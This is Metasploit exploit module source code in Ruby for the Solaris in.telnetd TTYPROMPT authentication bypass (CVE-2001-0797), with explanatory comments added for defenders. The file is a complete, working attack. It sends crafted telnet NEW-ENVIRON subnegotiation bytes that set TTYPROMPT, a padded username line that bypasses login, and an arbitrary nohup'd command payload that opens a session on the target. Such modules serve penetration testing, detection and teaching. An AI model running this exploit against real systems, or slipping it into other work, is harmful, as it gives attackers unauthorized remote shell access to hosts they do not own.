Path: blob/master/modules/exploits/solaris/telnet/ttyprompt.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Solaris in.telnetd TTYPROMPT authentication bypass (CVE-2001-0797; see
# 'References' below). The module drives a plain telnet session: it pushes a
# NEW-ENVIRON subnegotiation that sets TTYPROMPT, sends the username padded
# with filler, then writes one command line once a shell is expected. No
# binary payload is staged ('Arch' is ARCH_CMD).
#
# Defender notes: the TTYPROMPT subnegotiation and the unusually long username
# line are observable on the wire, and the nohup'd command line is recorded by
# the target's shell/process logging (hence IOC_IN_LOGS in 'Notes'). The
# module itself marks the target side as CRASH_SAFE.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata and options. Only two options are registered: the telnet
  # port (RPORT, default 23) and the account name to present (USER, default
  # 'bin').
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',
        'Description' => %q{
          This module uses a buffer overflow in the Solaris 'login'
          application to bypass authentication in the telnet daemon.
        },
        'Author' => [ 'MC', 'cazz' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2001-0797'],
          ['OSVDB', '690'],
          ['BID', '5531'],
        ],
        'Privileged' => false,
        'Platform' => %w[solaris unix],
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Space' => 2000,
          'BadChars' => '',
          'DisableNops' => true,
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic perl telnet'
          }
        },
        'Targets' => [
          ['Automatic', {}],
        ],
        'DisclosureDate' => '2002-01-18',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      Opt::RPORT(23),
      OptString.new('USER', [ true, 'The username to use', 'bin' ]),
    ])
  end

  # Runs the exchange over a single TCP connection.
  #
  # Sequence (steps are separated by fixed 0.25 s pauses; Kernel#select with
  # nil fd sets and a timeout is simply a sleep):
  #   1. read and discard the telnet banner,
  #   2. send telnet option negotiation plus a NEW-ENVIRON subnegotiation
  #      carrying TTYPROMPT=<6 random alphanumerics>,
  #   3. send datastore['USER'] followed by 65 repetitions of " <filler>",
  #   4. send the command payload wrapped in nohup and start the handler.
  #
  # Nothing in the server's responses is inspected; success is determined
  # only by whether the handler receives a session.
  def exploit
    connect

    # Banner is read only to consume it; the value is unused.
    _banner = sock.get_once

    print_status('Setting TTYPROMPT...')

    # Telnet option negotiation followed by a NEW-ENVIRON (option 0x27)
    # subnegotiation. RFC 854 command bytes: IAC=0xff, WILL=0xfb, DONT=0xfc,
    # SB=0xfa, SE=0xf0. Option bytes 0x18/0x1f/0x21/0x23/0x22/0x24/0x27/0x00
    # are TERMINAL-TYPE, NAWS, TOGGLE-FLOW-CONTROL, X-DISPLAY-LOCATION,
    # LINEMODE, ENVIRON, NEW-ENVIRON and BINARY. Inside the SB block
    # (RFC 1572): 0x00 IS, 0x00 VAR "TTYPROMPT", 0x01 VALUE <6 random
    # alphanumerics>, then IAC SE. The fixed 6-character value length is
    # presumably tied to the vulnerable login's buffer handling; that is not
    # derivable from this file -- confirm against the CVE reference above.
    req =
      "\xff\xfc\x18" \
      "\xff\xfc\x1f" \
      "\xff\xfc\x21" \
      "\xff\xfc\x23" \
      "\xff\xfb\x22" \
      "\xff\xfc\x24" \
      "\xff\xfb\x27" \
      "\xff\xfb\x00" \
      "\xff\xfa\x27\x00" \
      "\x00TTYPROMPT" \
      "\x01" +
      rand_text_alphanumeric(6) +
      "\xff\xf0"

    sock.put(req)
    # 0.25 s pause so the server can process the negotiation before more
    # input arrives.
    select(nil, nil, nil, 0.25)

    print_status('Sending username...')

    # 1-10 random alphabetic characters; repeated below as " <filler>" x 65.
    filler = rand_text_alpha(1..10)

    # NOTE(review): `req` still holds the negotiation bytes already sent above,
    # so the next put re-transmits them ahead of the username line. Whether
    # the repeat is required or merely harmless is not evident from this file.
    req << datastore['USER'] + (" #{filler}" * 65)

    sock.put(req + "\n\n\n")

    select(nil, nil, nil, 0.25)
    # Drain whatever the server returned (presumably the post-login prompt);
    # the contents are not checked.
    sock.get_once

    # Detach the command from the tty and discard its output. This is the
    # line that lands in the target's shell history / process auditing.
    sock.put("nohup #{payload.encoded} >/dev/null 2>&1\n")

    select(nil, nil, nil, 0.25)

    handler
  end
end